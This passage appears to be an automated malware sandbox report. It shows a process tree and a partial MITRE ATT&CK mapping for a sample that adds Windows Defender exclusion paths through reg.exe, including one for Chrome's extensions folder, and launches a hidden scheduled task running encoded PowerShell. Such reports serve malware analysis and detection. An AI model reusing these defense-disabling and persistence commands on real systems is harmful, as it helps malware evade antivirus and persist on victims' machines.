      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rEeGjZNaAiUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2632
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\skJyvfnXIyXU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:1220
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\skJyvfnXIyXU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:1976
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wCCFmxPIU" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2076
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wCCFmxPIU" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:1572
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WitzacxcsoaTddVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1964
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WitzacxcsoaTddVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:2372
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:1256
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:2856
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:1756
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1608
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:484
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:2852
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gJQZoGxKO" /SC once /ST 00:43:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1520
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gJQZoGxKO"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2100

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1584

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2472

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indirect Command Execution

T1202

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery